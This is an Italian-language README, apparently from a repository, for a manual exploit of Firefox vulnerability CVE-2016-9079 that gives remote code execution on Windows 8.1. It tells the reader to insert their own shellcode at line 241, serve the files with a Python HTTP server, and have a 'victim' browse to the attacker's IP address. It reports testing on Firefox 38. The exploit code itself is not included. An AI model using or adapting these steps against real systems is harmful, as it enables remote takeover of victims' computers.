
Exploit manuale per Firefox RCE CVE-2016-9079 con shellcode personalizzabile, servito tramite HTTP per l'esecuzione remota di codice su sistemi Windows vulnerabili.
Questo è un exploit manuale di https://www.exploit-db.com/exploits/41151, un altro esiste per Windows 10 (https://github.com/soham23/firefox-rce-nssmil) ma non funzionava su Windows 8.1, quindi ho creato il mio.
Devi modificare la riga 241 con il tuo shellcode. C'è un esempio sopra questa riga.
Scarica il repository e avvia un server. Usare un server Python funziona bene.
python3 -m http.server 8080
Sulla tua vittima, naviga su http://<attacker_ip>:8080/ e dovrebbe funzionare.
Testato su Windows 8.1 Enterprise x64 con Firefox 38.